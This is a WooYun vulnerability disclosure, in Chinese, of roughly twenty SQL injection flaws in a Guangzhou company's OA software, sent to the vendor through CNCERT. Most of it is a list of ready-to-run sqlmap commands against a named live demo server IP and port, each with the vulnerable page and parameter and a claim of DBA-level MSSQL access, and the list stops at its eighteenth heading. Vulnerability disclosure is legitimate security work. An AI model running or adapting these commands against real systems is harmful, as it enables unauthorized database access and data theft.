当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0121216

漏洞标题:我要一网打尽某OA系统注入漏洞再来20处高危注入打包

相关厂商:国家互联网应急中心

漏洞作者: goubuli

提交时间:2015-06-18 10:32

修复时间:2015-09-21 08:46

公开时间:2015-09-21 08:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-18: 细节已通知厂商并且等待厂商处理中
2015-06-23: 厂商已经确认,细节仅向厂商公开
2015-06-26: 细节向第三方安全合作伙伴开放
2015-08-17: 细节向核心白帽子及相关领域专家公开
2015-08-27: 细节向普通白帽子公开
2015-09-06: 细节向实习白帽子公开
2015-09-21: 细节向公众公开

简要描述:

RT
两种类型:GET注入和POST注入打包一起发
应该没有注入了,被我挖干净了。。。( ̄▽ ̄)"

详细说明:

又是这么多提交的好累。。。挖的也好累啊。。。

厂商:广州市名将软件开发有限公司
官网:http://oa.fg.net.cn/index.asp
官方演示demo:http://112.124.41.23:38888/
原址:http://oa.yf1668.com
demo测试,mssql注入,DBA权限。


给审核大神点个赞,这个漏洞审核太快了。。。 WooYun: 某OA系统20处高危注入打包(无需登录,DBA权限)
我这个还没提交完

main.png


不重复的注入漏洞:
注入一、

sqlmap.py -u "http://112.124.41.23:38888/CRM/MyCustomNeed.aspx" --dbms="mssql" --batch --dbs --data "__VIEWSTATE=%2FwEPDwUKLTg1OTA5MjgxMw9kFgJmD2QWBgIPDzwrAA0BAA8WBh4LXyFEYXRhQm91bmRnHglQYWdlQ291bnQCAR4LXyFJdGVtQ291bnQCAWQWAmYPZBYEAgEPD2QWBB4Lb25tb3VzZW92ZXIFQWM9dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I7dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9JyNFNEY0RkYnHgpvbm1vdXNlb3V0BR10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jOxYOZg9kFgICAQ8PFgIeBFRleHQFATFkZAIBD2QWAgIBDw8WAh4LTmF2aWdhdGVVcmwFEk5lZWRWaWV3LmFzcHg%2FSUQ9MWQWAmYPFQEDZGZnZAICDw8WAh8FBQUgZmdkZ2RkAgMPDxYCHwUFA2RmZ2RkAgQPDxYCHwUFA2RmZ2RkAgUPDxYCHwUFAmdkZGQCBg8PFgIfBQUCZGdkZAICDw8WAh4HVmlzaWJsZWhkZAIZDw8WAh8FBQExZGQCGw8PFgIfBQUBMWRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYLBQxJbWFnZUJ1dHRvbjQFDEltYWdlQnV0dG9uMQUMSW1hZ2VCdXR0b241BQxJbWFnZUJ1dHRvbjMFDEltYWdlQnV0dG9uMgUYR1ZEYXRhJGN0bDAyJENoZWNrU2VsZWN0BQhCdG5GaXJzdAUGQnRuUHJlBQdCdG5OZXh0BQdCdG5MYXN0BQhCdXR0b25HbwUGR1ZEYXRhD2dkWJ6Yz2XAgQ9Jn1lsamNxEmQpQ0k%3D&DropDownList1=NeedContent&TextBox1=d&ImageButton4.x=26&ImageButton4.y=4&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWGwKMtcioDwK%2FyLvNDgKihNChCgKBxq7sDgKEy5dZAunOtdMDAq%2BZ%2BoUHAue0yIgEAp3hof8OAr6Ar9sKAt2G%2FcIOAq2hhkICssrl0wIC7NGy6wYC0sL9mgQC0sKZ0wgC0sLpvwsC0sLBiQoC0sLV5AICo8yu9ggC7v%2Fd4Q8C1prZ5QMClenzjgoCkem3jwkCuu2%2BrgICpLLVlgUC%2Bo6i9wlkZxA1t7YKOtF1j%2FkICG43F3980Q%3D%3D" -p TextBox1
TextBox1存在POST注入


150617_16.png


注入二、

sqlmap.py -u "http://112.124.41.23:38888/CRM/MySongYang.aspx" --dbms="mssql" --batch --data "__VIEWSTATE=%2FwEPDwULLTE4ODMzODkwMDEPZBYCZg9kFgYCDw88KwANAQAPFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnRmZGQCGQ8PFgIeBFRleHQFATFkZAIbDw8WAh8CBQEwZGQYAgUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgoFDEltYWdlQnV0dG9uNAUMSW1hZ2VCdXR0b24xBQxJbWFnZUJ1dHRvbjUFDEltYWdlQnV0dG9uMwUMSW1hZ2VCdXR0b24yBQhCdG5GaXJzdAUGQnRuUHJlBQdCdG5OZXh0BQdCdG5MYXN0BQhCdXR0b25HbwUGR1ZEYXRhD2dkBbkbM1eruLsMm1cFLMg0GiKcB6U%3D&DropDownList1=CustomName&TextBox1=a&ImageButton4.x=23&ImageButton4.y=8&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWGAKZ2P%2F5DAK%2FyLvNDgKllePHCAKH%2F8WBDgLqvNPTDQLo5NPqAgLHrMH7DQKKpcrXCwKO6fqcCwKtoYZCArLK5dMCAuzRsusGAtLC%2FZoEAtLCmdMIAtLC6b8LAtLCwYkKAtLC1eQCAu7%2F3eEPAtaa2eUDApXp844KApHpt48JArrtvq4CAqSy1ZYFAvqOovcJ9ZVcIIV%2B9rWMysuGJpH3gjstVKI%3D" -p TextBox1
TextBox1存在POST注入


150617_18.png


注入三、

sqlmap.py -u "http://112.124.41.23:38888/CRM/MyCustomHate.aspx" --dbms="mssql" --batch --data "__VIEWSTATE=%2FwEPDwUKLTM5NzIxNjgwMQ9kFgJmD2QWBgIPDzwrAA0BAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudGZkZAIZDw8WAh4EVGV4dAUBMWRkAhsPDxYCHwIFATBkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCgUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uNQUMSW1hZ2VCdXR0b24zBQxJbWFnZUJ1dHRvbjIFCEJ0bkZpcnN0BQZCdG5QcmUFB0J0bk5leHQFB0J0bkxhc3QFCEJ1dHRvbkdvBQZHVkRhdGEPZ2ThPqs2rydL4pxKWeqvpQcFMMq3Gg%3D%3D&DropDownList1=CustomName&TextBox1=a&ImageButton4.x=14&ImageButton4.y=3&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWFQLk4ZnPCAK%2FyLvNDgKBsLzQCwLcgsVtAr3bqNwGAuydjIcPAq2hhkICssrl0wIC7NGy6wYC0sL9mgQC0sKZ0wgC0sLpvwsC0sLBiQoC0sLV5AIC7v%2Fd4Q8C1prZ5QMClenzjgoCkem3jwkCuu2%2BrgICpLLVlgUC%2Bo6i9wk7gHMuqX53jS4jILenuBfWIzb7eg%3D%3D" -p TextBox1
TextBox1存在POST注入


150617_20.png


注入四、

sqlmap.py -u "http://112.124.41.23:38888/CRM/MyCustomBack.aspx" --dbms="mssql" --batch --data "__VIEWSTATE=%2FwEPDwUKLTM5NzIxNjgwMQ9kFgJmD2QWBgIPDzwrAA0BAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudGZkZAIZDw8WAh4EVGV4dAUBMWRkAhsPDxYCHwIFATBkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCgUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uNQUMSW1hZ2VCdXR0b24zBQxJbWFnZUJ1dHRvbjIFCEJ0bkZpcnN0BQZCdG5QcmUFB0J0bk5leHQFB0J0bkxhc3QFCEJ1dHRvbkdvBQZHVkRhdGEPZ2QMuetnJRHpNX%2BCRAJ5%2BxtTe9ANgQ%3D%3D&DropDownList1=CustomName&TextBox1=a&ImageButton4.x=22&ImageButton4.y=11&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWFQL4r7rYCgK%2FyLvNDgLxkp2pBwLSzcTNDgL7tqfgBgLCzZjMDgKtoYZCArLK5dMCAuzRsusGAtLC%2FZoEAtLCmdMIAtLC6b8LAtLCwYkKAtLC1eQCAu7%2F3eEPAtaa2eUDApXp844KApHpt48JArrtvq4CAqSy1ZYFAvqOovcJVMjI%2FZGa2ooRTzgtCMPCWXjgxEA%3D" -p TextBox1
TextBox1存在POST注入


150617_22.png


注入五、

sqlmap.py -u "http://112.124.41.23:38888/Supply/BuyLog.aspx" --dbms="mssql" --batch --data "__VIEWSTATE=%2FwEPDwUKLTI1MTAzMzQzMg9kFgJmD2QWBgIMDzwrAA0BAA8WBh4LXyFEYXRhQm91bmRnHglQYWdlQ291bnQCAR4LXyFJdGVtQ291bnQCAmQWAmYPZBYGAgEPD2QWBB4Lb25tb3VzZW92ZXIFQWM9dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I7dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9JyNFNEY0RkYnHgpvbm1vdXNlb3V0BR10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jOxYSZg9kFgICAQ8PFgIeBFRleHQFATJkZAIBD2QWAgIBDw8WAh4LTmF2aWdhdGVVcmwFGEJ1eUNoYW5QaW5WaWV3LmFzcHg%2FSUQ9MmQWAmYPFQEG5Lq65Y%2BCZAICDw8WAh8FBQZkZmRmZGZkZAIDDw8WAh8FBQU0NS4wMGRkAgQPDxYCHwUFBTQ1LjAwZGQCBQ8PFgIfBQUHNDU0NS4wMGRkAgYPDxYCHwUFBTQ1LjAwZGQCBw8PFgIfBQUHNDU1NS4wMGRkAggPDxYCHwUFCeacquS6pOS7mGRkAgIPD2QWBB8DBUFjPXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yO3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPScjRTRGNEZGJx8EBR10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jOxYSZg9kFgICAQ8PFgIfBQUBMWRkAgEPZBYCAgEPDxYCHwYFGEJ1eUNoYW5QaW5WaWV3LmFzcHg%2FSUQ9MWQWAmYPFQEDc2RmZAICDw8WAh8FBQVzZGZzZGRkAgMPDxYCHwUFBTIxLjAwZGQCBA8PFgIfBQUFMTIuMDBkZAIFDw8WAh8FBQUxMi4wMGRkAgYPDxYCHwUFBTEyLjAwZGQCBw8PFgIfBQUFMTIuMDBkZAIIDw8WAh8FBQnmnKrkuqTku5hkZAIDDw8WAh4HVmlzaWJsZWhkZAIWDw8WAh8FBQExZGQCGA8PFgIfBQUBMWRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYMBQxJbWFnZUJ1dHRvbjQFDEltYWdlQnV0dG9uMQUMSW1hZ2VCdXR0b241BQxJbWFnZUJ1dHRvbjMFDEltYWdlQnV0dG9uMgUYR1ZEYXRhJGN0bDAyJENoZWNrU2VsZWN0BRhHVkRhdGEkY3RsMDMkQ2hlY2tTZWxlY3QFCEJ0bkZpcnN0BQZCdG5QcmUFB0J0bk5leHQFB0J0bkxhc3QFCEJ1dHRvbkdvBQZHVkRhdGEPZ2Qc9wtPFis%2BzWutehswyKBxcS%2FFOA%3D%3D&TextBox1=a&ImageButton4.x=26&ImageButton4.y=7&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWEAKHn9L8CgLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgKjzK72CAKjzNLWAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CRAs2InAwbiXBy5WDDjVCXekL7Jo" -p TextBox1
TextBox1存在POST注入


150617_24.png


注入六、

sqlmap.py -u "http://112.124.41.23:38888/Project/ShiShiRiZhi.aspx" --dbms="mssql" --batch --data "__VIEWSTATE=%2FwEPDwUJNjA5NDQ1Nzg5D2QWAmYPZBYGAgwPPCsADQEADxYEHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50ZmRkAhYPDxYCHgRUZXh0BQExZGQCGA8PFgIfAgUBMGRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYKBQxJbWFnZUJ1dHRvbjQFDEltYWdlQnV0dG9uMQUMSW1hZ2VCdXR0b241BQxJbWFnZUJ1dHRvbjMFDEltYWdlQnV0dG9uMgUIQnRuRmlyc3QFBkJ0blByZQUHQnRuTmV4dAUHQnRuTGFzdAUIQnV0dG9uR28FBkdWRGF0YQ9nZCHcz8kyvxhMS0bB96rUVgXWRwTO&TextBox1=abc&ImageButton4.x=19&ImageButton4.y=11&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWDgKZ1qS9AQLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CRSSXtGvMZJxYdVngKONF3%2Fkh199" -p TextBox1
TextBox1存在POST注入


150617_24.png


注入七、

sqlmap.py -u "http://112.124.41.23:38888/Project/ShouKuan.aspx?ProjectName=" --dbms="mssql" --batch --dbs
ProjectName注入


150617_30.png


注入八、

sqlmap.py -u "http://112.124.41.23:38888/Project/ShouKuan.aspx?ProjectName=" --dbms="mssql" --batch --dbs --data "__VIEWSTATE=%2FwEPDwUKLTI1MTAzMzQzMg9kFgJmD2QWBgIMDzwrAA0BAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudGZkZAIWDw8WAh4EVGV4dAUBMWRkAhgPDxYCHwIFATBkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCgUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uNQUMSW1hZ2VCdXR0b24zBQxJbWFnZUJ1dHRvbjIFCEJ0bkZpcnN0BQZCdG5QcmUFB0J0bk5leHQFB0J0bkxhc3QFCEJ1dHRvbkdvBQZHVkRhdGEPZ2TWfrWXa7Z4Q5q4uAW%2FRDr6vRCFkg%3D%3D&TextBox1=abc&ImageButton4.x=31&ImageButton4.y=11&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWDgK8lsXSDgLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CQY1AT1VSwATlrGbpmZavKKaulyh" -p TextBox1
TextBox1存在POST注入


150617_31.png


注入九、

sqlmap.py -u "http://112.124.41.23:38888/Project/LiRuiGuanLi.aspx?ProjectName=" --dbms="mssql" --batch --dbs
ProjectName存在注入


150617_32.png


注入十、

sqlmap.py -u "http://112.124.41.23:38888/Project/LiRuiGuanLi.aspx?ProjectName=" --dbms="mssql" --batch --dbs --data "__VIEWSTATE=%2FwEPDwULLTExOTM1Mjc1NzYPZBYCZg9kFgYCDA88KwANAQAPFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnRmZGQCFg8PFgIeBFRleHQFATFkZAIYDw8WAh8CBQEwZGQYAgUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgoFDEltYWdlQnV0dG9uNAUMSW1hZ2VCdXR0b24xBQxJbWFnZUJ1dHRvbjUFDEltYWdlQnV0dG9uMwUMSW1hZ2VCdXR0b24yBQhCdG5GaXJzdAUGQnRuUHJlBQdCdG5OZXh0BQdCdG5MYXN0BQhCdXR0b25HbwUGR1ZEYXRhD2dkJjBlmE6L8Xs%2FINq88smT0psJeSk%3D&TextBox1=abc&ImageButton4.x=30&ImageButton4.y=7&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWDgKjlre5BALs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3Cbx%2BgsItWEB2Ut1NImQ7DCLeN0xP" -p TextBox1
TextBox1存在POST注入


150617_33.png


注入十一、

sqlmap.py -u "http://112.124.41.23:38888/Project/ProjectJinDu.aspx" --dbms="mssql" --data "__VIEWSTATE=%2FwEPDwUKMTM5MzE2MTU5Mg9kFgJmD2QWBgIMDzwrAA0BAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudGZkZAIWDw8WAh4EVGV4dAUBMWRkAhgPDxYCHwIFATBkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCgUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uNQUMSW1hZ2VCdXR0b24zBQxJbWFnZUJ1dHRvbjIFCEJ0bkZpcnN0BQZCdG5QcmUFB0J0bk5leHQFB0J0bkxhc3QFCEJ1dHRvbkdvBQZHVkRhdGEPZ2RMkeNiL4fyySar6FjKQtmkxWtf8A%3D%3D&TextBox1=11&ImageButton4.x=25&ImageButton4.y=9&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWDgLU8sK%2FBALs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3Cd%2BcuY%2BBUJ%2B0TUV9VWVKrnpFqh8Y" -p TextBox1
TextBox1存在POST注入


150617_34.png


注入十二、

sqlmap.py -u "http://112.124.41.23:38888/Sell/SellLog.aspx?HeTongName=" --dbms="mssql"
HeTongName存在注入


150617_35.png


注入十三、

sqlmap.py -u "http://112.124.41.23:38888/Sell/SellLog.aspx?HeTongName=" --dbms="mssql" --batch --data "__VIEWSTATE=%2FwEPDwUKLTI1MTAzMzQzMg9kFgJmD2QWBgIMDzwrAA0BAA8WBh4LXyFEYXRhQm91bmRnHglQYWdlQ291bnQCAR4LXyFJdGVtQ291bnQCAmQWAmYPZBYGAgEPD2QWBB4Lb25tb3VzZW92ZXIFQWM9dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I7dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9JyNFNEY0RkYnHgpvbm1vdXNlb3V0BR10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jOxYSZg9kFgICAQ8PFgIeBFRleHQFATJkZAIBD2QWAgIBDw8WAh4LTmF2aWdhdGVVcmwFHUNvbnRyYWN0Q2hhblBpblZpZXcuYXNweD9JRD0yZBYCZg8VAQvoh6rooYzou4piMWQCAg8PFgIfBQUY5buj5bee6LuK6KGMMSAyMDEzLjExLjE0ZGQCAw8PFgIfBQUGNDAwLjAwZGQCBA8PFgIfBQUENS4wMGRkAgUPDxYCHwUFBzIwMDAuMDBkZAIGDw8WAh8FBQcxNTAwLjAwZGQCBw8PFgIfBQUGNTAwLjAwZGQCCA8PFgIfBQUJ5bey5Lqk5LuYZGQCAg8PZBYEHwMFQWM9dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I7dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9JyNFNEY0RkYnHwQFHXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPWM7FhJmD2QWAgIBDw8WAh8FBQExZGQCAQ9kFgICAQ8PFgIfBgUdQ29udHJhY3RDaGFuUGluVmlldy5hc3B4P0lEPTFkFgJmDxUBATFkAgIPDxYCHwUFBumHh%2Bi0rWRkAgMPDxYCHwUFBTE1LjAwZGQCBA8PFgIfBQUGNTAwLjAwZGQCBQ8PFgIfBQUHNzUwMC4wMGRkAgYPDxYCHwUFBzc1MDAuMDBkZAIHDw8WAh8FBQQwLjAwZGQCCA8PFgIfBQUJ5bey5Lqk5LuYZGQCAw8PFgIeB1Zpc2libGVoZGQCFg8PFgIfBQUBMWRkAhgPDxYCHwUFATFkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WDAUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uNQUMSW1hZ2VCdXR0b24zBQxJbWFnZUJ1dHRvbjIFGEdWRGF0YSRjdGwwMiRDaGVja1NlbGVjdAUYR1ZEYXRhJGN0bDAzJENoZWNrU2VsZWN0BQhCdG5GaXJzdAUGQnRuUHJlBQdCdG5OZXh0BQdCdG5MYXN0BQhCdXR0b25HbwUGR1ZEYXRhD2dkYy%2F1cZAgrUo079zthVbF%2FJlIshA%3D&TextBox1=1&ImageButton4.x=26&ImageButton4.y=4&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWEALiitv6CgLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgKjzK72CAKjzNLWAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CbFmNj2RdRLlmhie89lDYFzXBRwA" -p TextBox1
TextBox1存在POST注入


150617_36.png


注入十四、

sqlmap.py -u "http://112.124.41.23:38888/Supply/SupplysLink.aspx?GongYingShang=" --dbms="mssql"
GongYingShang存在注入


150617_37.png


注入十五、

sqlmap.py -u "http://112.124.41.23:38888/Supply/SupplysLink.aspx" --dbms="mssql" --data "__VIEWSTATE=%2FwEPDwUKLTI1MTAzMzQzMg9kFgJmD2QWBgIMDzwrAA0BAA8WBh4LXyFEYXRhQm91bmRnHglQYWdlQ291bnQCAR4LXyFJdGVtQ291bnQCAWQWAmYPZBYEAgEPD2QWBB4Lb25tb3VzZW92ZXIFQWM9dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I7dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9JyNFNEY0RkYnHgpvbm1vdXNlb3V0BR10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jOxYSZg9kFgICAQ8PFgIeBFRleHQFATFkZAIBD2QWAgIBDw8WAh4LTmF2aWdhdGVVcmwFGFN1cHBseUxpbmtWaWV3LmFzcHg%2FSUQ9MWQWAmYPFQEDc2RmZAICDw8WAh8FBQZkc2Zkc2ZkZAIDDw8WAh8FBQNzZGZkZAIEDw8WAh8FBQPnlLdkZAIFDw8WAh8FBQnmlq%2FokoLoiqxkZAIGDw8WAh8FBQY2NDY0NTZkZAIHDw8WAh8FBQM0NTZkZAIIDw8WAh8FBQM0NTZkZAICDw8WAh4HVmlzaWJsZWhkZAIWDw8WAh8FBQExZGQCGA8PFgIfBQUBMWRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYLBQxJbWFnZUJ1dHRvbjQFDEltYWdlQnV0dG9uMQUMSW1hZ2VCdXR0b241BQxJbWFnZUJ1dHRvbjMFDEltYWdlQnV0dG9uMgUYR1ZEYXRhJGN0bDAyJENoZWNrU2VsZWN0BQhCdG5GaXJzdAUGQnRuUHJlBQdCdG5OZXh0BQdCdG5MYXN0BQhCdXR0b25HbwUGR1ZEYXRhD2dkI6DHR6wwLdTi6NFydX%2Bn%2F1dxUDc%3D&TextBox1=ASD&ImageButton4.x=36&ImageButton4.y=4&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWDwLdsLmiDQLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgKjzK72CALu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CUix3ea0%2FVLYbWVfqNDYfRbSQYqU" -p TextBox1
TextBox1存在POST注入


150617_38.png


注入十六、

sqlmap.py -u "http://112.124.41.23:38888/Supply/BuyOrder.aspx" --dbms="mssql" --data "__VIEWSTATE=%2FwEPDwUJNjA5NDQ1Nzg5D2QWAmYPZBYGAgwPPCsADQEADxYGHgtfIURhdGFCb3VuZGceCVBhZ2VDb3VudAIBHgtfIUl0ZW1Db3VudAIBZBYCZg9kFgQCAQ8PZBYEHgtvbm1vdXNlb3ZlcgVBYz10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcjt0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj0nI0U0RjRGRiceCm9ubW91c2VvdXQFHXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPWM7FhBmD2QWAgIBDw8WAh4EVGV4dAUBMWRkAgEPZBYCAgEPDxYCHgtOYXZpZ2F0ZVVybAUWQnV5T3JkZXJWaWV3LmFzcHg%2FSUQ9MWQWAmYPFQEGZGZkZmRmZAICDw8WAh8FBQVzZGZzZmRkAgMPDxYCHwUFA3NkZmRkAgQPDxYCHwUFDOW5v%2BW3nuiHtOS%2FoWRkAgUPDxYCHwUFBWFkbWluZGQCBg8PFgIfBQUQMjAxMC0xLTEgMDowMDowMGRkAgcPDxYCHwUFDOetieW%2BheWuoeaguGRkAgIPDxYCHgdWaXNpYmxlaGRkAhYPDxYCHwUFATFkZAIYDw8WAh8FBQExZGQYAgUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgsFDEltYWdlQnV0dG9uNAUMSW1hZ2VCdXR0b24xBQxJbWFnZUJ1dHRvbjUFDEltYWdlQnV0dG9uMwUMSW1hZ2VCdXR0b24yBRhHVkRhdGEkY3RsMDIkQ2hlY2tTZWxlY3QFCEJ0bkZpcnN0BQZCdG5QcmUFB0J0bk5leHQFB0J0bkxhc3QFCEJ1dHRvbkdvBQZHVkRhdGEPZ2TXut0IcMwlZoFtT3iDkc6VPhYrTA%3D%3D&TextBox1=df&ImageButton4.x=22&ImageButton4.y=6&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWDwKVhsOBCgLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgKjzK72CALu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CZ%2F3Zt3e%2FITPYlHuDKMUU4kWebgQ" -p TextBox1
TextBox1存在POST注入


150617_39.png


注入十七、

sqlmap.py -u "http://112.124.41.23:38888/Supply/Supplys.aspx" --dbms="mssql" --data "__VIEWSTATE=%2FwEPDwUJNjA5NDQ1Nzg5D2QWAmYPZBYGAgwPPCsADQEADxYGHgtfIURhdGFCb3VuZGceCVBhZ2VDb3VudAIBHgtfIUl0ZW1Db3VudAICZBYCZg9kFgYCAQ8PZBYEHgtvbm1vdXNlb3ZlcgVBYz10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcjt0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj0nI0U0RjRGRiceCm9ubW91c2VvdXQFHXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPWM7FhBmD2QWAgIBDw8WAh4EVGV4dAUBMmRkAgEPZBYCAgEPDxYCHgtOYXZpZ2F0ZVVybAUVU3VwcGx5c1ZpZXcuYXNweD9JRD0yZBYCZg8VAQZzZGZzZGZkAgIPDxYCHwUFBXNkZnNmZGQCAw8PFgIfBQUFc2Rmc2ZkZAIEDw8WAh8FBQQ0NTY1ZGQCBQ8PFgIfBQUENDU2NGRkAgYPDxYCHwUFAzU0NmRkAgcPDxYCHwUFAzQ1NmRkAgIPD2QWBB8DBUFjPXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yO3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPScjRTRGNEZGJx8EBR10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jOxYQZg9kFgICAQ8PFgIfBQUBMWRkAgEPZBYCAgEPDxYCHwYFFVN1cHBseXNWaWV3LmFzcHg%2FSUQ9MWQWAmYPFQEM5bm%2F5bee6Ie05L%2BhZAICDw8WAh8FBQcwMjAwMDAxZGQCAw8PFgIfBQUGJm5ic3A7ZGQCBA8PFgIfBQUGJm5ic3A7ZGQCBQ8PFgIfBQUGJm5ic3A7ZGQCBg8PFgIfBQUGJm5ic3A7ZGQCBw8PFgIfBQUGJm5ic3A7ZGQCAw8PFgIeB1Zpc2libGVoZGQCFg8PFgIfBQUBMWRkAhgPDxYCHwUFATFkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WDAUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uNQUMSW1hZ2VCdXR0b24zBQxJbWFnZUJ1dHRvbjIFGEdWRGF0YSRjdGwwMiRDaGVja1NlbGVjdAUYR1ZEYXRhJGN0bDAzJENoZWNrU2VsZWN0BQhCdG5GaXJzdAUGQnRuUHJlBQdCdG5OZXh0BQdCdG5MYXN0BQhCdXR0b25HbwUGR1ZEYXRhD2dksAiQ8uwZGJQ3OSNmVyIgDb8hyU0%3D&TextBox1=sdf&ImageButton4.x=23&ImageButton4.y=5&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWEAKHp4CLAwLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgKjzK72CAKjzNLWAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CVC9mLjd61k9IXwsoe8r75K0c3hm" -p TextBox1
TextBox1存在POST注入


150617_40.png


注入十八、

